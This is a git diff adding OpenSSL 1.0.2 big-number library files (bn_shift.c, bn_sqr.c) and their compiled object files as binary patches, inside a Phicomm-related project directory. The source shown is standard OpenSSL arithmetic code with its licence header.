diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_recp.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_recp.o
new file mode 100644
index 0000000000000000000000000000000000000000..48c623ba14dafb18573ac23447c6446b86dbf3ba
GIT binary patch
literal 5024
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_shift.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_shift.c
new file mode 100644
index 0000000..4f3e8ff
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_shift.c
@@ -0,0 +1,214 @@
+/* crypto/bn/bn_shift.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include "bn_lcl.h"
+
+int BN_lshift1(BIGNUM *r, const BIGNUM *a)
+{
+    register BN_ULONG *ap, *rp, t, c;
+    int i;
+
+    bn_check_top(r);
+    bn_check_top(a);
+
+    if (r != a) {
+        r->neg = a->neg;
+        if (bn_wexpand(r, a->top + 1) == NULL)
+            return (0);
+        r->top = a->top;
+    } else {
+        if (bn_wexpand(r, a->top + 1) == NULL)
+            return (0);
+    }
+    ap = a->d;
+    rp = r->d;
+    c = 0;
+    for (i = 0; i < a->top; i++) {
+        t = *(ap++);
+        *(rp++) = ((t << 1) | c) & BN_MASK2;
+        c = (t & BN_TBIT) ? 1 : 0;
+    }
+    if (c) {
+        *rp = 1;
+        r->top++;
+    }
+    bn_check_top(r);
+    return (1);
+}
+
+int BN_rshift1(BIGNUM *r, const BIGNUM *a)
+{
+    BN_ULONG *ap, *rp, t, c;
+    int i, j;
+
+    bn_check_top(r);
+    bn_check_top(a);
+
+    if (BN_is_zero(a)) {
+        BN_zero(r);
+        return (1);
+    }
+    i = a->top;
+    ap = a->d;
+    j = i - (ap[i - 1] == 1);
+    if (a != r) {
+        if (bn_wexpand(r, j) == NULL)
+            return (0);
+        r->neg = a->neg;
+    }
+    rp = r->d;
+    t = ap[--i];
+    c = (t & 1) ? BN_TBIT : 0;
+    if (t >>= 1)
+        rp[i] = t;
+    while (i > 0) {
+        t = ap[--i];
+        rp[i] = ((t >> 1) & BN_MASK2) | c;
+        c = (t & 1) ? BN_TBIT : 0;
+    }
+    r->top = j;
+    bn_check_top(r);
+    return (1);
+}
+
+int BN_lshift(BIGNUM *r, const BIGNUM *a, int n)
+{
+    int i, nw, lb, rb;
+    BN_ULONG *t, *f;
+    BN_ULONG l;
+
+    bn_check_top(r);
+    bn_check_top(a);
+
+    r->neg = a->neg;
+    nw = n / BN_BITS2;
+    if (bn_wexpand(r, a->top + nw + 1) == NULL)
+        return (0);
+    lb = n % BN_BITS2;
+    rb = BN_BITS2 - lb;
+    f = a->d;
+    t = r->d;
+    t[a->top + nw] = 0;
+    if (lb == 0)
+        for (i = a->top - 1; i >= 0; i--)
+            t[nw + i] = f[i];
+    else
+        for (i = a->top - 1; i >= 0; i--) {
+            l = f[i];
+            t[nw + i + 1] |= (l >> rb) & BN_MASK2;
+            t[nw + i] = (l << lb) & BN_MASK2;
+        }
+    memset(t, 0, nw * sizeof(t[0]));
+    /*
+     * for (i=0; i<nw; i++) t[i]=0;
+     */
+    r->top = a->top + nw + 1;
+    bn_correct_top(r);
+    bn_check_top(r);
+    return (1);
+}
+
+int BN_rshift(BIGNUM *r, const BIGNUM *a, int n)
+{
+    int i, j, nw, lb, rb;
+    BN_ULONG *t, *f;
+    BN_ULONG l, tmp;
+
+    bn_check_top(r);
+    bn_check_top(a);
+
+    nw = n / BN_BITS2;
+    rb = n % BN_BITS2;
+    lb = BN_BITS2 - rb;
+    if (nw >= a->top || a->top == 0) {
+        BN_zero(r);
+        return (1);
+    }
+    i = (BN_num_bits(a) - n + (BN_BITS2 - 1)) / BN_BITS2;
+    if (r != a) {
+        r->neg = a->neg;
+        if (bn_wexpand(r, i) == NULL)
+            return (0);
+    } else {
+        if (n == 0)
+            return 1;           /* or the copying loop will go berserk */
+    }
+
+    f = &(a->d[nw]);
+    t = r->d;
+    j = a->top - nw;
+    r->top = i;
+
+    if (rb == 0) {
+        for (i = j; i != 0; i--)
+            *(t++) = *(f++);
+    } else {
+        l = *(f++);
+        for (i = j - 1; i != 0; i--) {
+            tmp = (l >> rb) & BN_MASK2;
+            l = *(f++);
+            *(t++) = (tmp | (l << lb)) & BN_MASK2;
+        }
+        if ((l = (l >> rb) & BN_MASK2))
+            *(t) = l;
+    }
+    bn_check_top(r);
+    return (1);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_shift.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_shift.o
new file mode 100644
index 0000000000000000000000000000000000000000..ebc0299315b386ea3e32ea35d2fd9029157c2ec3
GIT binary patch
literal 3016
zcmbtUZ){Ul6u<ogyg~O?b<sr(G-fetfVv_9i^lDBuj_r%f=CMy9Hr~ZpU67WzRDml
zOlk=?kE$PxfltOSeDI?m3>stJm@A+OwhZHtkN|#xy@hQ8`vXEf_w~K4dzQq+lbm<%
z{oV6B=iYPfeaC!(cC*QZbTOf~(A-Q%5jw%lja$`WE2>2{bgypN!!RZfwqWvTv-BY&
z`EA%UCcZ3%?PQzXGv3EYK8Cb0ildajO?fygr$^ng67`H9v&~`RXg~_0fMjuBc3;FX
zALA+XEfu6SMVxzcEv}gnh^>Ih1TLM!{dZcFo8Qw|SsB;ib3(3OK1=tEvlqq1_`I2p
zOKr^d9UTL7d)!to%!Oc+kGDuWne4T+%{{4Z<<1Fk3`lEnY=9%z1#(}=9LZ0c>OPn2
zzLh!WAoe^F8+lKU?Z{$I;v4P6XIJWZa#tk_M0U%;tSoL&ZspoaSV|*&N|5UFm=tmU
z%@$l75v`ci=d*I(azTQ?m^=g!*Zhph3??A}s9WiRa-ApLjCz6{9o+j|2e-4l@324~
za3PLdQTM)CYPWya3Oj}>6Th7lPEXB{0aN~sgSMl7PD(QY$%k<4Q4s2wvo0%L;wFD;
z!KZL+QaEpwfrrEwd2&My0aTo`t`l-r*;(YsFUnRJPAku8{g^%5QRPf_vbPqFH33H%
z$E8ck7|z)q(`arvK+fO$nuGqDhD$Q>F>q2phU_?2z`0OyT3G?)LJ-J2xeDAMxgrdW
zl477{7lSjm8DZ#FfV{&fS4$VfB{(wz;9&-d6A((R1~ibCLoEg=KpTH-g}k%PBtxgU
zsV5v6l-e2IbGy$9H>=J)iOE>GyMy42$rSWeojZp!a!Z+!7d)e)p!bybq-{qU1<BgT
zNn#@-#D3#Rxtf8Tt-w3)y5-4%7IC@qDo<vk&z5M9G6+|yU)hd5<6;;p)i02G8JA?`
zE*VyfEl5s2x3hGb{5mz`mYu%~WCX5ANfw4iJbCeXL0Z{QFNA`J{uFBd2$GOItz6rX
zvknKdmqkl}*ympj<Zo+R?`R5lrW0b?;c>m@YF_1DmsY3lzSYgH<~7bT4ChByP&?=X
zQ2)j-G9x5Y%mPZKzHE@`@Vm&=Yd0;mEn+@{2h<4oOWN9()cRQaaWl_0WGp=EFn`K6
zaIBqUnb%>7*Zj^>+s@iQF?-pDoW;vJPFgv(>G%SkZO$w-f5kR&tOJ(3tli5p2(1D4
zk0=MEmOfhG=FC2};Uvv*+{&{}nFSo%Z2n7SaypadRC9r4)rU`W;%Yg^j5&c)RcIJ1
znkZFUv{d~g(i-YjoX@hTRiBU1nFTHUH>l!^o`OS>s)$AH=KKX4OrNdTr`j{XUI3;2
zH_9pis^PS@G>*>K>)iGf|4o|zHd;UswU1!m1Eq1g;KET+`vf)yS}iZ?Ohi(9_w5#4
zG34DC*{_b>DB=%n@^XR5ruOzNzEC8@c>}%(^^Nx)h$gyLQ{SZK3&T`gj2!GqcFl#D
zbD*O{x;xUjPfQ_1&rgNEg(aYWm&(FX5X6Y<b)a}HsP6xOI)fPfi&{O5_!n9|jB(CX
z;Iuw^{QDJn<vtxWDF|KGT+}&MzjL_W$BzxT-mf1FxZW@1N*(GJqn%*IWZCZ3N6Gm9
zs7s9ZipbR!6{E=2nMxs7tf#v>o&YS-BgS3uuUVB6qp=UP`JP1Dbs*VuAf6NtA(t8<
zzBjTv8SRd1JNSRb0d!h&;|psAj7rk*RJHb$7vZ}Ul=h?*v{I(EfU*WI21~j6%WTl_
zS2Wy^27O}$G=F3Mm0C=r`+w!TwfxOmeBJ2$6*{0<J-=?(1FnxNU9THAWZ>(*Z^MB8
z#VYS2UAv+29duG5di`{$69zQDk*_ud@NwNyvqpXg;MMwfR{OQ?(s;Cgl&kag{#DHl
ue&aMK$SJKj^bOX48u=8fR;m-){po@AN-@^@8Ca~wZ_pC$uO!3R$o~gG5L_<+

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_sqr.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_sqr.c
new file mode 100644
index 0000000..3ca6987
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_sqr.c
@@ -0,0 +1,290 @@
+/* crypto/bn/bn_sqr.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include "bn_lcl.h"
+
+/* r must not be a */
+/*
+ * I've just gone over this and it is now %20 faster on x86 - eay - 27 Jun 96
+ */
+int BN_sqr(BIGNUM *r, const BIGNUM *a, BN_CTX *ctx)
+{
+    int max, al;
+    int ret = 0;
+    BIGNUM *tmp, *rr;
+
+#ifdef BN_COUNT
+    fprintf(stderr, "BN_sqr %d * %d\n", a->top, a->top);
+#endif
+    bn_check_top(a);
+
+    al = a->top;
+    if (al <= 0) {
+        r->top = 0;
+        r->neg = 0;
+        return 1;
+    }
+
+    BN_CTX_start(ctx);
+    rr = (a != r) ? r : BN_CTX_get(ctx);
+    tmp = BN_CTX_get(ctx);
+    if (!rr || !tmp)
+        goto err;
+
+    max = 2 * al;               /* Non-zero (from above) */
+    if (bn_wexpand(rr, max) == NULL)
+        goto err;
+
+    if (al == 4) {
+#ifndef BN_SQR_COMBA
+        BN_ULONG t[8];
+        bn_sqr_normal(rr->d, a->d, 4, t);
+#else
+        bn_sqr_comba4(rr->d, a->d);
+#endif
+    } else if (al == 8) {
+#ifndef BN_SQR_COMBA
+        BN_ULONG t[16];
+        bn_sqr_normal(rr->d, a->d, 8, t);
+#else
+        bn_sqr_comba8(rr->d, a->d);
+#endif
+    } else {
+#if defined(BN_RECURSION)
+        if (al < BN_SQR_RECURSIVE_SIZE_NORMAL) {
+            BN_ULONG t[BN_SQR_RECURSIVE_SIZE_NORMAL * 2];
+            bn_sqr_normal(rr->d, a->d, al, t);
+        } else {
+            int j, k;
+
+            j = BN_num_bits_word((BN_ULONG)al);
+            j = 1 << (j - 1);
+            k = j + j;
+            if (al == j) {
+                if (bn_wexpand(tmp, k * 2) == NULL)
+                    goto err;
+                bn_sqr_recursive(rr->d, a->d, al, tmp->d);
+            } else {
+                if (bn_wexpand(tmp, max) == NULL)
+                    goto err;
+                bn_sqr_normal(rr->d, a->d, al, tmp->d);
+            }
+        }
+#else
+        if (bn_wexpand(tmp, max) == NULL)
+            goto err;
+        bn_sqr_normal(rr->d, a->d, al, tmp->d);
+#endif
+    }
+
+    rr->neg = 0;
+    /*
+     * If the most-significant half of the top word of 'a' is zero, then the
+     * square of 'a' will max-1 words.
+     */
+    if (a->d[al - 1] == (a->d[al - 1] & BN_MASK2l))
+        rr->top = max - 1;
+    else
+        rr->top = max;
+    if (rr != r)
+        BN_copy(r, rr);
+    ret = 1;
+ err:
+    bn_check_top(rr);
+    bn_check_top(tmp);
+    BN_CTX_end(ctx);
+    return (ret);
+}
+
+/* tmp must have 2*n words */
+void bn_sqr_normal(BN_ULONG *r, const BN_ULONG *a, int n, BN_ULONG *tmp)
+{
+    int i, j, max;
+    const BN_ULONG *ap;
+    BN_ULONG *rp;
+
+    max = n * 2;
+    ap = a;
+    rp = r;
+    rp[0] = rp[max - 1] = 0;
+    rp++;
+    j = n;
+
+    if (--j > 0) {
+        ap++;
+        rp[j] = bn_mul_words(rp, ap, j, ap[-1]);
+        rp += 2;
+    }
+
+    for (i = n - 2; i > 0; i--) {
+        j--;
+        ap++;
+        rp[j] = bn_mul_add_words(rp, ap, j, ap[-1]);
+        rp += 2;
+    }
+
+    bn_add_words(r, r, r, max);
+
+    /* There will not be a carry */
+
+    bn_sqr_words(tmp, a, n);
+
+    bn_add_words(r, r, tmp, max);
+}
+
+#ifdef BN_RECURSION
+/*-
+ * r is 2*n words in size,
+ * a and b are both n words in size.    (There's not actually a 'b' here ...)
+ * n must be a power of 2.
+ * We multiply and return the result.
+ * t must be 2*n words in size
+ * We calculate
+ * a[0]*b[0]
+ * a[0]*b[0]+a[1]*b[1]+(a[0]-a[1])*(b[1]-b[0])
+ * a[1]*b[1]
+ */
+void bn_sqr_recursive(BN_ULONG *r, const BN_ULONG *a, int n2, BN_ULONG *t)
+{
+    int n = n2 / 2;
+    int zero, c1;
+    BN_ULONG ln, lo, *p;
+
+# ifdef BN_COUNT
+    fprintf(stderr, " bn_sqr_recursive %d * %d\n", n2, n2);
+# endif
+    if (n2 == 4) {
+# ifndef BN_SQR_COMBA
+        bn_sqr_normal(r, a, 4, t);
+# else
+        bn_sqr_comba4(r, a);
+# endif
+        return;
+    } else if (n2 == 8) {
+# ifndef BN_SQR_COMBA
+        bn_sqr_normal(r, a, 8, t);
+# else
+        bn_sqr_comba8(r, a);
+# endif
+        return;
+    }
+    if (n2 < BN_SQR_RECURSIVE_SIZE_NORMAL) {
+        bn_sqr_normal(r, a, n2, t);
+        return;
+    }
+    /* r=(a[0]-a[1])*(a[1]-a[0]) */
+    c1 = bn_cmp_words(a, &(a[n]), n);
+    zero = 0;
+    if (c1 > 0)
+        bn_sub_words(t, a, &(a[n]), n);
+    else if (c1 < 0)
+        bn_sub_words(t, &(a[n]), a, n);
+    else
+        zero = 1;
+
+    /* The result will always be negative unless it is zero */
+    p = &(t[n2 * 2]);
+
+    if (!zero)
+        bn_sqr_recursive(&(t[n2]), t, n, p);
+    else
+        memset(&(t[n2]), 0, n2 * sizeof(BN_ULONG));
+    bn_sqr_recursive(r, a, n, p);
+    bn_sqr_recursive(&(r[n2]), &(a[n]), n, p);
+
+    /*-
+     * t[32] holds (a[0]-a[1])*(a[1]-a[0]), it is negative or zero
+     * r[10] holds (a[0]*b[0])
+     * r[32] holds (b[1]*b[1])
+     */
+
+    c1 = (int)(bn_add_words(t, r, &(r[n2]), n2));
+
+    /* t[32] is negative */
+    c1 -= (int)(bn_sub_words(&(t[n2]), t, &(t[n2]), n2));
+
+    /*-
+     * t[32] holds (a[0]-a[1])*(a[1]-a[0])+(a[0]*a[0])+(a[1]*a[1])
+     * r[10] holds (a[0]*a[0])
+     * r[32] holds (a[1]*a[1])
+     * c1 holds the carry bits
+     */
+    c1 += (int)(bn_add_words(&(r[n]), &(r[n]), &(t[n2]), n2));
+    if (c1) {
+        p = &(r[n + n2]);
+        lo = *p;
+        ln = (lo + c1) & BN_MASK2;
+        *p = ln;
+
+        /*
+         * The overflow will stop before we over write words we should not
+         * overwrite
+         */
+        if (ln < (BN_ULONG)c1) {
+            do {
+                p++;
+                lo = *p;
+                ln = (lo + 1) & BN_MASK2;
+                *p = ln;
+            } while (ln == 0);
+        }
+    }
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_sqr.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_sqr.o
new file mode 100644
index 0000000000000000000000000000000000000000..f3397a9c6695c4b04c281f302f885fd76eeaf140
GIT binary patch
literal 4264
zcmbuBYituo5P;WlfCJ1WKuW_qYTYV`VkIO}37{(HoZ~e;KmzlqD0Lm%A&A6D?K@tg
zM92hb<sL=qkM>{rhg7M8AN=44qHX|LMQx!xilF@g6>XD-M++*X;o;8QBUu|;>SLw#
z?tD8lJ3F&?=U$)ETIO&NyE(`kWK6OtAsti3=FP^mnM@%r@}Oegh_pf0mrql4zaXs-
zM6v<)P+AvYe@a1#UCy0bN7>W0G<Ca{X65WKno{O+)9eJC_FddtL(`(7Zx?8!Utw8=
zJq+k`G6T4%=)P*ooPo$0Ne{Z8)&H<kugXw;`D~gxEhvsG7&ipc%Dmx#-Z)QTL3g#n
zWOpS@T&8^*5OkN41{`4WtbyFQp;I#Zi?ZJ+yGz+ULyxAHyJhy1!tPpPm7Au{)Pmk7
zQ){#IwzOG#M+yyMSmu%8sCZ5(IC{R+NVzs04L9ZMLl#maLeZrF`zAF~(OYPB<XJAq
zE`9fyMjo^4R4;#OWP?3Y^yT9z9#LV>j8OYBdnd7L3LAm64ON`L!l}~`+y@QCI$nLI
zMTZkbF0Ry-D<lxPOm){4^cc|9DNqc>El}3z?#pO%F%t^=id~0XD6mj%<q>8>Q*e={
zLAyTl;4@3>A>@!(l-&aC4ECT`9dHbQno(5XmMfUa>?Y(D!c$oPXvP7;rU90v?5YL#
zxGQP83QBWRT9BoVd(=9$<jAV?CC86&*H%Vut<Zx%6Y4CZtSmW^ruqe%D^nlk*Wt8X
zGrX8jp=N98zT35sE;-!}hp%!+X}bKCTF41y``y*BP@nPj-Rhm0^$VCO=_IB$>#sy%
za03WNGS~x!-7$hynuatNGBb2`c65#>>bs+kqmW<0SAT1;60H4tqg!s$Tzlrj<;IE%
zQtC;$_A*U3(DeJna58ul_L3Q9*mT;LQNI{E4~l{|HBa#XC{i5~4r>*AgMr8s!$7Aw
z<3?P%AvK-R8c&sj+NEElWjkEGRe^K`xPVJPy4_HV!gBUT75mrZa=D>vzNQ_nJ(e<R
zf`OqjGy?+5(|-x|zo+oD2{i4@`ixA`w0vQh_0y&cnp4VsD>F?nGpRJ)Q74;sz}#{)
zb7?dEQQBbELmg)->^ozWi`^J|xK0y)OUu%l+I4MOT-9otJPn?@MfI<1hFHIMah<2G
zae;{m!NX%r<DmOjts`ZGWRN+bW2-U;;@G{0ICfS#X1gW`hoDk2@Hy7n0~}k$$`8v{
zh}8$3RIJg<ePZng<66bK1LI|JNos;DzFT%oTq28gezDdo)_BEguUP37g+pK(wfr2%
z%VhY0<%3Qi`thP4iT4wjBrX9U<@@nXR{kY-wm6D8f)FTl<An_4mHe0>bn9$JOcI{W
zFWx9~9tCG`x`L>{L5YTL%gG<PV$05=UmC25U6p(*r%}axhLV$ve;yj#_{Kc9<|M*%
z41v?Q9r;U>K%B<KY1{!|)zFPQp07?kCHS%uTq(idD#6=<V?1^o#$5uoqlA863I0(D
zez*kx960WK1Rfl0#(jbDIP_w9__755x&*&kg5%R)%>VBt_~R0sw8cZo_Y$6nH3`ML
z6J6m>67nmny^<1I-P*d=7Yqd@ui^`#PM6jh+R>eeCT$@cjgEml0sM}wppb|~v_x|2
z_L#j{q`Rvv+?XdVK`GMJ!&z!=mf&55u@V?sf*V6gHJngwVM|O!!`RNAa6GygX<X|H
